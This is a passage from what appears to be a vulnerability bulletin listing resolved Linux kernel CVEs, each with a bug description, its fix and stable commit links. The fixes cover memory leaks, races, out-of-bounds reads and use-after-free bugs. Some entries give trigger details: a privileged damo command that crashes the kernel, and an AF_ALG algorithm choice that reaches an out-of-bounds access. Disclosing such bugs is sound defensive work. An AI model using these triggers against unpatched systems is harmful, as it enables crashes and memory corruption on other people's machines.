already on the termination steps, so it never handles the new request. As a result, the damos_walk() caller thread infinitely waits. Fix this by introducing another damon_ctx field, namely walk_control_obsolete. It is protected by the damon_ctx->walk_control_lock, which protects damos_walk() request registration. Initialize (unset) it in kdamond_fn() before letting damon_start() returns and set it just before the cancelling of the remaining damos_walk() request is executed. damos_walk() reads the obsolete field under the lock and avoids adding a new request. After this change, only requests that are guaranteed to be handled or cancelled are registered. Hence the after-registration DAMON context termination check is no longer needed. Remove it together. The issue is found by sashiko [1]. | 2026-05-27 | not yet calculated | CVE-2026-46008 | https://git.kernel.org/stable/c/0ba956a239ba6e3fae8555d3660e22e675be63b5 https://git.kernel.org/stable/c/33c3f6c2b48cd84b441dba1ee3e62290e53930f4 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: PCI: endpoint: pci-epf-ntb: Remove duplicate resource teardown epf_ntb_epc_destroy() duplicates the teardown that the caller is supposed to do later. This leads to an oops when .allow_link fails or when .drop_link is performed. Remove the helper. Also drop pci_epc_put(). EPC device refcounting is tied to configfs EPC group lifetime, and pci_epc_put() in the .drop_link path is sufficient. | 2026-05-27 | not yet calculated | CVE-2026-46009 | https://git.kernel.org/stable/c/72099f015d3c77bf2eb703d1aab113bd7a60915a https://git.kernel.org/stable/c/756ca5e7ed22d9045bb4de4c981f9149278d5cd3 https://git.kernel.org/stable/c/65fc57c8b8f0b31be62be291cb1bb01755cec85d https://git.kernel.org/stable/c/e813c95e4c8edd31599081e6356e20ada30e266d https://git.kernel.org/stable/c/3446beddba450c8d6f9aca2f028712ac527fead3 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: rxrpc: Fix memory leaks in rxkad_verify_response() Fix rxkad_verify_response() to free the ticket and the server key under all circumstances by initialising the ticket pointer to NULL and then making all paths through the function after the first allocation has been done go through a single common epilogue that just releases everything - where all the releases skip on a NULL pointer. | 2026-05-27 | not yet calculated | CVE-2026-46012 | https://git.kernel.org/stable/c/c4b8f32e73eafd4a5076be890c7c8506ec04567c https://git.kernel.org/stable/c/852b9d64cea421336579b2de3d1338dfa677e2dd https://git.kernel.org/stable/c/861b9a0a1823bf064a7b810d29502a9ef043f40f https://git.kernel.org/stable/c/c91f33fb8356dedc82bc56ce210f1a5dbee62a52 https://git.kernel.org/stable/c/34f61a07e0cdefaecd3ec03bb5fb22215643678f |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: mm/memfd_luo: fix physical address conversion in put_folios cleanup In memfd_luo_retrieve_folios()'s put_folios cleanup path: 1. kho_restore_folio() expects a phys_addr_t (physical address) but receives a raw PFN (pfolio->pfn). This causes kho_restore_page() to check the wrong physical address (pfn << PAGE_SHIFT instead of the actual physical address). 2. This loop lacks the !pfolio->pfn check that exists in the main retrieval loop and memfd_luo_discard_folios(), which could incorrectly process sparse file holes where pfn=0. Fix by converting PFN to physical address with PFN_PHYS() and adding the !pfolio->pfn check, matching the pattern used elsewhere in this file. This issue was identified by the AI review. https://sashiko.dev/#/patchset/20260323110747.193569-1-duanchenghao@kylinos.cn | 2026-05-27 | not yet calculated | CVE-2026-46013 | https://git.kernel.org/stable/c/bd0d6bde286a2b8e3ae7975b0dcc2d43875d5fc9 https://git.kernel.org/stable/c/3538f90ab89aaf302782b4b073a0aae66904cd67 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: KVM: SVM: Add missing save/restore handling of LBR MSRs MSR_IA32_DEBUGCTLMSR and LBR MSRs are currently not enumerated by KVM_GET_MSR_INDEX_LIST, and LBR MSRs cannot be set with KVM_SET_MSRS. So save/restore is completely broken. Fix it by adding the MSRs to msrs_to_save_base, and allowing writes to LBR MSRs from userspace only (as they are read-only MSRs) if LBR virtualization is enabled. Additionally, to correctly restore L1's LBRs while L2 is running, make sure the LBRs are copied from the captured VMCB01 save area in svm_copy_vmrun_state(). Note, for VMX, this also fixes a flaw where MSR_IA32_DEBUGCTLMSR isn't reported as an MSR to save/restore. Note #2, over-reporting MSR_IA32_LASTxxx on Intel is ok, as KVM already handles unsupported reads and writes thanks to commit b5e2fec0ebc3 ("KVM: Ignore DEBUGCTL MSRs with no effect") (kvm_do_msr_access() will morph the unsupported userspace write into a nop). [sean: guard with lbrv checks, massage changelog] | 2026-05-27 | not yet calculated | CVE-2026-46014 | https://git.kernel.org/stable/c/2b922a42b531a82d7881add14a7698dcdc5e1f0a https://git.kernel.org/stable/c/13a89ada5dcfc2539514c83ba5a2c61157f1ec6c https://git.kernel.org/stable/c/3700f0788da6acf73b2df56690f4b201aa4aefd2 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: remoteproc: xlnx: Only access buffer information if IPI is buffered In the receive callback check if message is NULL to prevent possibility of crash by NULL pointer dereferencing. | 2026-05-27 | not yet calculated | CVE-2026-46016 | https://git.kernel.org/stable/c/5d1451cb2cf6f3d9884d76035a1460aa9bb4b053 https://git.kernel.org/stable/c/7ddbf21116770b7011f2bb0a6056b7604b24c497 https://git.kernel.org/stable/c/06d0bed2552fd0dae27d374d4492a2b672e24eed https://git.kernel.org/stable/c/8242579859a78c801bb626e9aa4823aca93e28e7 https://git.kernel.org/stable/c/38dd6ccfdfbbe865569a52fe1ba9fa1478f672e6 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: mm: fix deferred split queue races during migration migrate_folio_move() records the deferred split queue state from src and replays it on dst. Replaying it after remove_migration_ptes(src, dst, 0) makes dst visible before it is requeued, so a concurrent rmap-removal path can mark dst partially mapped and trip the WARN in deferred_split_folio(). Move the requeue before remove_migration_ptes() so dst is back on the deferred split queue before it becomes visible again. Because migration still holds dst locked at that point, teach deferred_split_scan() to requeue a folio when folio_trylock() fails. Otherwise a fully mapped underused folio can be dequeued by the shrinker and silently lost from split_queue. [ziy@nvidia.com: move the comment] | 2026-05-27 | not yet calculated | CVE-2026-46017 | https://git.kernel.org/stable/c/cbf75cf212ee6e499abc1757fb4b5ae6d70ed0aa https://git.kernel.org/stable/c/3bac01168982ec3e3bf87efdc1807c7933590a85 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: ALSA: usb-audio: stop parsing UAC2 rates at MAX_NR_RATES parse_uac2_sample_rate_range() caps the number of enumerated rates at MAX_NR_RATES, but it only breaks out of the current rate loop. A malformed UAC2 RANGE response with additional triplets continues parsing the remaining triplets and repeatedly prints "invalid uac2 rates" while probe still holds register_mutex. Stop the whole parse once the cap is reached and return the number of rates collected so far. | 2026-05-27 | not yet calculated | CVE-2026-46018 | https://git.kernel.org/stable/c/ab5ba9fd138758ddc50222264ff246b31e397abf https://git.kernel.org/stable/c/ba036305323814ec1f8655313b2fa6a0f7048716 https://git.kernel.org/stable/c/4d7893a137eadb6163ea4298bf67d74b811d76ef https://git.kernel.org/stable/c/a0b78639ef09b2e77974a3de3b1c07f6de3c5e56 https://git.kernel.org/stable/c/3c318f97dcc50b2e0556a1813bd6958678e881fd |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: crypto: atmel-aes - Fix 3-page memory leak in atmel_aes_buff_cleanup atmel_aes_buff_init() allocates 4 pages using __get_free_pages() with ATMEL_AES_BUFFER_ORDER, but atmel_aes_buff_cleanup() frees only the first page using free_page(), leaking the remaining 3 pages. Use free_pages() with ATMEL_AES_BUFFER_ORDER to fix the memory leak. | 2026-05-27 | not yet calculated | CVE-2026-46019 | https://git.kernel.org/stable/c/b63f1e2f0e319ad3fe4a58eb3db4fd50cc98baca https://git.kernel.org/stable/c/65b3589d39d05699c3850202f8333e5361033ea3 https://git.kernel.org/stable/c/61516b4a5b2647dc3f8f67b5dffaf038be997511 https://git.kernel.org/stable/c/230ad8a78fe67266b1ba4685da1abdd61471c5b8 https://git.kernel.org/stable/c/3fcfff4ed35f963380a68741bcd52742baff7f76 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: mm/damon/core: validate damos_quota_goal->nid for node_mem_{used,free}_bp Patch series "mm/damon/core: validate damos_quota_goal->nid". node_mem[cg]_{used,free}_bp DAMOS quota goals receive the node id. The node id is used for si_meminfo_node() and NODE_DATA() without proper validation. As a result, privileged users can trigger an out of bounds memory access using DAMON_SYSFS. Fix the issues. The issue was originally reported [1] with a fix by another author. The original author announced [2] that they will stop working including the fix that was still in the review stage. Hence I'm restarting this. This patch (of 2): Users can set damos_quota_goal->nid with arbitrary value for node_mem_{used,free}_bp. But DAMON core is using those for si_meminfo_node() without the validation of the value. This can result in out of bounds memory access. The issue can actually triggered using DAMON user-space tool (damo), like below. $ sudo ./damo start --damos_action stat \ --damos_quota_goal node_mem_used_bp 50% -1 \ --damos_quota_interval 1s $ sudo dmesg [...] [ 65.565986] Unable to handle kernel NULL pointer dereference at virtual address 0000000000000098 Fix this issue by adding the validation of the given node. If an invalid node id is given, it returns 0% for used memory ratio, and 100% for free memory ratio. | 2026-05-27 | not yet calculated | CVE-2026-46020 | https://git.kernel.org/stable/c/b09958e235f2b9cd3898b85a8529172afa80d212 https://git.kernel.org/stable/c/bcad74078708f2330a45b55358ebc38f8f4b1127 https://git.kernel.org/stable/c/40250b2dded0604a112be605f3828700d80ad7c2 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: thermal: core: Fix thermal zone governor cleanup issues If thermal_zone_device_register_with_trips() fails after adding a thermal governor to the thermal zone being registered, the governor is not removed from it as appropriate which may lead to a memory leak. In turn, thermal_zone_device_unregister() calls thermal_set_governor() without acquiring the thermal zone lock beforehand which may race with a governor update via sysfs and may lead to a use-after-free in that case. Address these issues by adding two thermal_set_governor() calls, one to thermal_release() to remove the governor from the given thermal zone, and one to the thermal zone registration error path to cover failures preceding the thermal zone device registration. | 2026-05-27 | not yet calculated | CVE-2026-46021 | https://git.kernel.org/stable/c/37a430a2d4e66ec8238da6c7f7e48809bf265e13 https://git.kernel.org/stable/c/f412e541d25a3dfaf3d53e012ade6ff03cae8a45 https://git.kernel.org/stable/c/75f8f3c3e09122270986de9d7aa347d701676761 https://git.kernel.org/stable/c/64d4ebf91d082034bbc5ae3ba2d7fd800bc02d06 https://git.kernel.org/stable/c/41ff66baf81c6541f4f985dd7eac4494d03d9440 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: misc: ibmasm: fix OOB MMIO read in ibmasm_handle_mouse_interrupt() ibmasm_handle_mouse_interrupt() performs an out-of-bounds MMIO read when the queue reader or writer index from hardware exceeds REMOTE_QUEUE_SIZE (60). A compromised service processor can trigger this by writing an out-of-range value to the reader or writer MMIO register before asserting an interrupt. Since writer is re-read from hardware on every loop iteration, it can also be set to an out-of-range value after the loop has already started. The root cause is that get_queue_reader() and get_queue_writer() return raw readl() values that are passed directly into get_queue_entry(), which computes: queue_begin + reader * sizeof(struct remote_input) with no bounds check. This unchecked MMIO address is then passed to memcpy_fromio(), reading 8 bytes from unintended device registers. For sufficiently large values the address falls outside the PCI BAR mapping entirely, triggering a machine check exception. Fix by checking both indices against REMOTE_QUEUE_SIZE at the top of the loop body, before any call to get_queue_entry(). On an out-of-range value, reset the reader register to 0 via set_queue_reader() before breaking, so that normal queue operation can resume if the corrupted hardware state is transient. | 2026-05-27 | not yet calculated | CVE-2026-46022 | https://git.kernel.org/stable/c/fc7e9a74e32299d7e93e178ca482a0b59ef1595b https://git.kernel.org/stable/c/07c4f18b303106e6b24492c12b95d48a4b985841 https://git.kernel.org/stable/c/22a16d3eafee92a165c756081587c95850127107 https://git.kernel.org/stable/c/1ca75f6b74ec7f685464e5745ecfcf3a76d284e9 https://git.kernel.org/stable/c/4b6e6ead556734bdc14024c5f837132b1e7a4b84 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: dm mirror: fix integer overflow in create_dirty_log() The argument count calculation in create_dirty_log() performs `*args_used = 2 + param_count` before validating against argc. When a user provides a param_count close to UINT_MAX via the device mapper table string, this unsigned addition wraps around to a small value, causing the subsequent `argc < *args_used` check to be bypassed. The overflowed param_count is then passed as argc to dm_dirty_log_create(), where it can cause out-of-bounds reads on the argv array. Fix by comparing param_count against argc - 2 before performing the addition, following the same pattern used by parse_features() in the same file. Since argc >= 2 is already guaranteed, the subtraction is safe. | 2026-05-27 | not yet calculated | CVE-2026-46023 | https://git.kernel.org/stable/c/35f6b3281efd44d19110574663bc17a610bc73b9 https://git.kernel.org/stable/c/47dad9eea75d33212d3d2cea10e7ed6a1bfc0713 https://git.kernel.org/stable/c/87c99a50e0fdc68a5b9b52a94d49452cd3ff02ca https://git.kernel.org/stable/c/17a08791d428885d00e510864283a7b839792368 https://git.kernel.org/stable/c/4c788c6f921b22f9b6c3f316c4a071c05683e7de |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: mm/damon/core: fix damon_call() vs kdamond_fn() exit race Patch series "mm/damon/core: fix damon_call()/damos_walk() vs kdmond exit race". damon_call() and damos_walk() can leak memory and/or deadlock when they race with kdamond terminations. Fix those. This patch (of 2); When kdamond_fn() main loop is finished, the function cancels all remaining damon_call() requests and unset the damon_ctx->kdamond so that API callers and API functions themselves can know the context is terminated. damon_call() adds the caller's request to the queue first. After that, it shows if the kdamond of the damon_ctx is still running (damon_ctx->kdamond is set). Only if the kdamond is running, damon_call() starts waiting for the kdamond's handling of the newly added request. The damon_call() requests registration and damon_ctx->kdamond unset are protected by different mutexes, though. Hence, damon_call() could race with damon_ctx->kdamond unset, and result in deadlocks. For example, let's suppose kdamond successfully finished the damon_call() requests cancelling. Right after that, damon_call() is called for the context. It registers the new request, and shows the context is still running, because damon_ctx->kdamond unset is not yet done. Hence the damon_call() caller starts waiting for the handling of the request. However, the kdamond is already on the termination steps, so it never handles the new request. As a result, the damon_call() caller threads infinitely waits. Fix this by introducing another damon_ctx field, namely call_controls_obsolete. It is protected by the damon_ctx->call_controls_lock, which protects damon_call() requests registration. Initialize (unset) it in kdamond_fn() before letting damon_start() returns and set it just before the cancelling of remaining damon_call() requests is executed. damon_call() reads the obsolete field under the lock and avoids adding a new request. After this change, only requests that are guaranteed to be handled or cancelled are registered. Hence the after-registration DAMON context termination check is no longer needed. Remove it together. Note that the deadlock will not happen when damon_call() is called for repeat mode request. In tis case, damon_call() returns instead of waiting for the handling when the request registration succeeds and it shows the kdamond is running. However, if the request also has dealloc_on_cancel, the request memory would be leaked. The issue is found by sashiko [1]. | 2026-05-27 | not yet calculated | CVE-2026-46025 | https://git.kernel.org/stable/c/2691332ad88b57179c38653e2cd613d5820a52cf https://git.kernel.org/stable/c/e6a053a6f4b5048746c49432a5cc5b79fe4695fe https://git.kernel.org/stable/c/55da81663b9642dd046b26dd6f1baddbcf337c1e |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: net: qrtr: ns: Limit the maximum number of lookups Current code does no bound checking on the number of lookups a client can perform. Though the code restricts the lookups to local clients, there is still a possibility of a malicious local client sending a flood of NEW_LOOKUP messages over the same socket. Fix this issue by limiting the maximum number of lookups to 64 globally. Since the nameserver allows only atmost one local observer, this global lookup count will ensure that the lookups stay within the limit. Note that, limit of 64 is chosen based on the current platform requirements. If requirement changes in the future, this limit can be increased. | 2026-05-27 | not yet calculated | CVE-2026-46026 | https://git.kernel.org/stable/c/0dbec101a7076e9b1e4bd1876f7cf07c56ff4ce3 https://git.kernel.org/stable/c/76adf8f69b0bb3ab20be7c58f5d555027332d113 https://git.kernel.org/stable/c/20855cef7e659ef84ac73251256fa530819b2346 https://git.kernel.org/stable/c/2b930bc77e00cb27e1d6e1d497b3b596283465ef https://git.kernel.org/stable/c/5640227d9a21c6a8be249a10677b832e7f40dc55 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: crypto: algif_aead - snapshot IV for async AEAD requests AF_ALG AEAD AIO requests currently use the socket-wide IV buffer during request processing. For async requests, later socket activity can update that shared state before the original request has fully completed, which can lead to inconsistent IV handling. Snapshot the IV into per-request storage when preparing the AEAD request, so in-flight operations no longer depend on mutable socket state. | 2026-05-27 | not yet calculated | CVE-2026-46028 | https://git.kernel.org/stable/c/08ea39a556ecd39b33c2b4888861001c6706a62e https://git.kernel.org/stable/c/a920cabdb0b7cf1f4e11a20524253ae5bd09092b https://git.kernel.org/stable/c/fa0fcec9b49d58e71df7ede91ecd86855f608e85 https://git.kernel.org/stable/c/c2138c9bd02af19e0b407376140cd5435b0d81da https://git.kernel.org/stable/c/46fdb39e83227b5d39f7c934a0947ea913f13c18 https://git.kernel.org/stable/c/ebc235675f24b0e3f8bc92b8419471d42f837d8f https://git.kernel.org/stable/c/3d72f8c6490dc79210b64270740cb2a8619361a4 https://git.kernel.org/stable/c/5aa58c3a572b3e3b6c786953339f7978b845cc52 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: EDAC/versalnet: Fix device_node leak in mc_probe() of_parse_phandle() returns a device_node reference that must be released with of_node_put(). The original code never freed r5_core_node on any exit path, causing a memory leak. Fix this by using the automatic cleanup attribute __free(device_node) which ensures of_node_put() is called when the variable goes out of scope. | 2026-05-27 | not yet calculated | CVE-2026-46030 | https://git.kernel.org/stable/c/b6e61356ad24987be40bf25369d22dd8dd00a513 https://git.kernel.org/stable/c/17e136993b2b5111d1ee1c57bbd188ae0bb0e128 https://git.kernel.org/stable/c/5c709b376460ff322580c41600e31c02f7cc0307 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: KVM: nSVM: Triple fault if restore host CR3 fails on nested #VMEXIT If loading L1's CR3 fails on a nested #VMEXIT, nested_svm_vmexit() returns an error code that is ignored by most callers, and continues to run L1 with corrupted state. A sane recovery is not possible in this case, and HW behavior is to cause a shutdown. Inject a triple fault instead, and do not return early from nested_svm_vmexit(). Continue cleaning up the vCPU state (e.g. clear pending exceptions), to handle the failure as gracefully as possible. From the APM: Upon #VMEXIT, the processor performs the following actions in order to return to the host execution context: ... if (illegal host state loaded, or exception while loading host state) shutdown else execute first host instruction following the VMRUN Remove the return value of nested_svm_vmexit(), which is mostly unchecked anyway. | 2026-05-27 | not yet calculated | CVE-2026-46032 | https://git.kernel.org/stable/c/9a738cf170a4a2332ea3a15e23ec65b5757fe4a1 https://git.kernel.org/stable/c/5d291ef0585ed880ed4dd71ea1a5965e0a65fb53 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: crypto: authencesn - reject short ahash digests during instance creation authencesn requires either a zero authsize or an authsize of at least 4 bytes because the ESN encrypt/decrypt paths always move 4 bytes of high-order sequence number data at the end of the authenticated data. While crypto_authenc_esn_setauthsize() already rejects explicit non-zero authsizes in the range 1..3, crypto_authenc_esn_create() still copied auth->digestsize into inst->alg.maxauthsize without validating it. The AEAD core then initialized the tfm's default authsize from that value. As a result, selecting an ahash with digest size 1..3, such as cbcmac(cipher_null), exposed authencesn instances whose default authsize was invalid even though setauthsize() would have rejected the same value. AF_ALG could then trigger the ESN tail handling with a too-short tag and hit an out-of-bounds access. Reject authencesn instances whose ahash digest size is in the invalid non-zero range 1..3 so that no tfm can inherit an unsupported default authsize. | 2026-05-27 | not yet calculated | CVE-2026-46033 | https://git.kernel.org/stable/c/b69933e97efea238ebbfcf70c2b1be1cd03f13e3 https://git.kernel.org/stable/c/67f1f0933cc3d78dde222842bcad2778ec7a0b88 https://git.kernel.org/stable/c/b42821c15445f93daea3e76ada682b2b7181c476 https://git.kernel.org/stable/c/9aff81e8217e9de2929084b03b3c7f81988c112b https://git.kernel.org/stable/c/5db6ef9847717329f12c5ea8aba7e9f588a980c0 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: vfio/cdx: Fix NULL pointer dereference in interrupt trigger path Add validation to ensure MSI is configured before accessing cdx_irqs array in vfio_cdx_set_msi_trigger(). Without this check, userspace can trigger a NULL pointer dereference by calling VFIO_DEVICE_SET_IRQS with VFIO_IRQ_SET_DATA_BOOL or VFIO_IRQ_SET_DATA_NONE flags before ever setting up interrupts via VFIO_IRQ_SET_DATA_EVENTFD. The vfio_cdx_msi_enable() function allocates the cdx_irqs array and sets config_msi to 1 only when called through the EVENTFD path. The trigger loop (for DATA_BOOL/DATA_NONE) assumed this had already been done, but there was no enforcement of this call ordering. This matches the protection used in the PCI VFIO driver where vfio_pci_set_msi_trigger() checks irq_is() before the trigger loop. | 2026-05-27 | not yet calculated | CVE-2026-46034 | https://git.kernel.org/stable/c/51bf7638f33aece41cb3f4cbeb942cc52950e329 https://git.kernel.org/stable/c/5d6c349c9823eb819fed8b537b088cf38126018c https://git.kernel.org/stable/c/338a736aaf15e8ba3635ce20b29af5b8fc15e66a https://git.kernel.org/stable/c/5ea5880764cbb164afb17a62e76ca75dc371409d |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: mm/page_alloc: return NULL early from alloc_frozen_pages_nolock() in NMI on UP On UP kernels (!CONFIG_SMP), spin_trylock() is a no-op that unconditionally succeeds even when the lock is already held. As a result, alloc_frozen_pages_nolock() called from NMI context can re-enter rmqueue() and acquire the zone lock that the interrupted context is already holding, corrupting the freelists. With CONFIG_DEBUG_SPINLOCK on UP, the following BUG is triggered with the slub_kunit test module: BUG: spinlock trylock failure on UP on CPU#0, kunit_try_catch/243 [...] Call Trace: <NMI> dump_stack_lvl+0x3f/0x60 do_raw_spin_trylock+0x41/0x50 _raw_spin_trylock+0x24/0x50 rmqueue.isra.0+0x2a9/0xa70 get_page_from_freelist+0xeb/0x450 alloc_frozen_pages_nolock_noprof+0x111/0x1e0 allocate_slab+0x42a/0x500 ___slab_alloc+0xa7/0x4c0 kmalloc_nolock_noprof+0x164/0x310 [...] </NMI> Fix this by returning NULL early when invoked from NMI on a UP kernel. | 2026-05-27 | not yet calculated | CVE-2026-46035 | https://git.kernel.org/stable/c/05b4ed8bef30bba4f559c8d835e2dd20c48cf8a4 https://git.kernel.org/stable/c/a6d57efeaae3f3b3656514f600eac96be713d90e https://git.kernel.org/stable/c/620b46ed6ae17c8438d889c8c0cfddab36a1476c |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: net: qrtr: ns: Free the node during ctrl_cmd_bye() A node sends the BYE packet when it is about to go down. So the nameserver should advertise the removal of the node to all remote and local observers and free the node finally. But currently, the nameserver doesn't free the node memory even after processing the BYE packet. This causes the node memory to leak. Hence, remove the node from Xarray list and free the node memory during both success and failure case of ctrl_cmd_bye(). | 2026-05-27 | not yet calculated | CVE-2026-46038 | https://git.kernel.org/stable/c/ff78ed177a66763085e3214d6fbe13ca8f0b3f11 https://git.kernel.org/stable/c/65932f5102bb5377db36c8a4f0c28179a1967a9a https://git.kernel.org/stable/c/154fc7fe3f62c46891c3c4302f4b5b5391c932e6 https://git.kernel.org/stable/c/076e4b162d6caba12c229e7f262df5b6881162b0 https://git.kernel.org/stable/c/68efba36446a7774ea5b971257ade049272a07ac |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: inotify: fix watch count leak when fsnotify_add_inode_mark_locked() fails When fsnotify_add_inode_mark_locked() fails in inotify_new_watch(), the error path calls inotify_remove_from_idr() but does not call dec_inotify_watches() to undo the preceding inc_inotify_watches(). This leaks a watch count, and repeated failures can exhaust the max_user_watches limit with -ENOSPC even when no watches are active. Prior to commit 1cce1eea0aff ("inotify: Convert to using per-namespace limits"), the watch count was incremented after fsnotify_add_mark_locked() succeeded, so this path was not affected. The conversion moved inc_inotify_watches() before the mark insertion without adding the corresponding rollback. Add the missing dec_inotify_watches() call in the error path. | 2026-05-27 | not yet calculated | CVE-2026-46040 | https://git.kernel.org/stable/c/8bcc1cd237ab5ccfdd102869fa031c541943cf40 https://git.kernel.org/stable/c/73ddc8518a32baff6bc17afda4ee1ebae5b4ed12 https://git.kernel.org/stable/c/fdaa42ca370d056428e5e171247c8fdce8dff36a https://git.kernel.org/stable/c/9e48844f708eb48bae4e79cb21edc097c966306d https://git.kernel.org/stable/c/6a320935fa4293e9e599ec9f85dc9eb3be7029f8 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: greybus: gb-beagleplay: fix sleep in atomic context in hdlc_tx_frames() hdlc_append() calls usleep_range() to wait for circular buffer space, but it is called with tx_producer_lock (a spinlock) held via hdlc_tx_frames() -> hdlc_append_tx_frame()/hdlc_append_tx_u8()/etc. Sleeping while holding a spinlock is illegal and can trigger "BUG: scheduling while atomic". Fix this by moving the buffer-space wait out of hdlc_append() and into hdlc_tx_frames(), before the spinlock is acquired. The new flow: 1. Pre-calculate the worst-case encoded frame length. 2. Wait (with sleep) outside the lock until enough space is available, kicking the TX consumer work to drain the buffer. 3. Acquire the spinlock, re-verify space, and write the entire frame atomically. This ensures that sleeping only happens without any lock held, and that frames are either fully enqueued or not written at all. This bug is found by CodeQL static analysis tool (interprocedural sleep-in-atomic query) and my code review. | 2026-05-27 | not yet calculated | CVE-2026-46041 | https://git.kernel.org/stable/c/9f2b87bcdfed55145acbf932dc12f2c057145cad https://git.kernel.org/stable/c/b2801647c203a38e013802e9e9616b5bfac64968 https://git.kernel.org/stable/c/51667fe2d9294d66e0228b9f51d1f01b6680a641 https://git.kernel.org/stable/c/6b526dca0966f2370835765019a54319b78fca8d |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: mm/mempolicy: fix memory leaks in weighted_interleave_auto_store() weighted_interleave_auto_store() fetches old_wi_state inside the if (!input) block only. This causes two memory leaks: 1. When a user writes "false" and the current mode is already manual, the function returns early without freeing the freshly allocated new_wi_state. 2. When a user writes "true", old_wi_state stays NULL because the fetch is skipped entirely. The old state is then overwritten by rcu_assign_pointer() but never freed, since the cleanup path is gated on old_wi_state being non-NULL. A user can trigger this repeatedly by writing "1" in a loop. Fix both leaks by moving the old_wi_state fetch before the input check, making it unconditional. This also allows a unified early return for both "true" and "false" when the requested mode matches the current mode. Reviewed by: Donet Tom <donettom@linux.ibm.com> | 2026-05-27 | not yet calculated | CVE-2026-46042 | https://git.kernel.org/stable/c/c42a7efb9060d89b72708ffaf255d0002c2164a7 https://git.kernel.org/stable/c/39caa9ca863f96b3d00447c5aa200cabda489856 https://git.kernel.org/stable/c/6fae274ce0e3109cbbc4c18b354eaace1f0af7d7 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: ipmi:ssif: Clean up kthread on errors If an error occurs after the ssif kthread is created, but before the main IPMI code starts the ssif interface, the ssif kthread will not be stopped. So make sure the kthread is stopped on an error condition if it is running. | 2026-05-27 | not yet calculated | CVE-2026-46044 | https://git.kernel.org/stable/c/858bc8b9edb6eaf0522900128bb9053e2df6b0f6 https://git.kernel.org/stable/c/800febc637d1c1974b1e899dea8a07e115d60766 https://git.kernel.org/stable/c/75c486cb1bcaa1a3ec3a6438498176a3a4998ae4 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: md/md-llbitmap: skip reading rdevs that are not in_sync When reading bitmap pages from member disks, the code iterates through all rdevs and attempts to read from the first available one. However, it only checks for raid_disk assignment and Faulty flag, missing the In_sync flag check. This can cause bitmap data to be read from spare disks that are still being rebuilt and don't have valid bitmap information yet. Reading stale or uninitialized bitmap data from such disks can lead to incorrect dirty bit tracking, potentially causing data corruption during recovery or normal operation. Add the In_sync flag check to ensure bitmap pages are only read from fully synchronized member disks that have valid bitmap data. | 2026-05-27 | not yet calculated | CVE-2026-46045 | https://git.kernel.org/stable/c/98623c7e2a51eab1833c8628d33fa9c6ef3ce325 https://git.kernel.org/stable/c/3115fa2f62970d98f2a639145fb8e2767db8bbf9 https://git.kernel.org/stable/c/7701e68b5072faa03a8f30b4081dc16df9092381 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: ext4: fix missing brelse() in ext4_xattr_inode_dec_ref_all() The commit c8e008b60492 ("ext4: ignore xattrs past end") introduced a refcount leak in when block_csum is false. ext4_xattr_inode_dec_ref_all() calls ext4_get_inode_loc() to get iloc.bh, but never releases it with brelse(). | 2026-05-27 | not yet calculated | CVE-2026-46046 | https://git.kernel.org/stable/c/1bc1107a3a403a6d440673ed6666f7b07ef868a8 https://git.kernel.org/stable/c/097227f1ffe1a85bc3c359f81c71e3d40e06e920 https://git.kernel.org/stable/c/1e6b0a69bf2c9c819255c7566e4355536d81d9cf https://git.kernel.org/stable/c/f072906688933bf47fabbaf63560be03357c8298 https://git.kernel.org/stable/c/77d059519382bd66283e6a4e83ee186e87e7708f |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: net: qrtr: ns: Fix use-after-free in driver remove() In the remove callback, if a packet arrives after destroy_workqueue() is called, but before sock_release(), the qrtr_ns_data_ready() callback will try to queue the work, causing use-after-free issue. Fix this issue by saving the default 'sk_data_ready' callback during qrtr_ns_init() and use it to replace the qrtr_ns_data_ready() callback at the start of remove(). This ensures that even if a packet arrives after destroy_workqueue(), the work struct will not be dereferenced. Note that it is also required to ensure that the RX threads are completed before destroying the workqueue, because the threads could be using the qrtr_ns_data_ready() callback. | 2026-05-27 | not yet calculated | CVE-2026-46047 | https://git.kernel.org/stable/c/0f313eb6a8f6dffa491373cf3afab979fa1c02f4 https://git.kernel.org/stable/c/db3c60ec772de30acae92d560dfcc5258e58dbe8 https://git.kernel.org/stable/c/2e127ceb1c415e246076d8e09e23e443a7a2038f https://git.kernel.org/stable/c/f96779e916576e81430ebb326baff6e433fef8ae https://git.kernel.org/stable/c/7809fea20c9404bfcfa6112ec08d1fe1d3520beb |
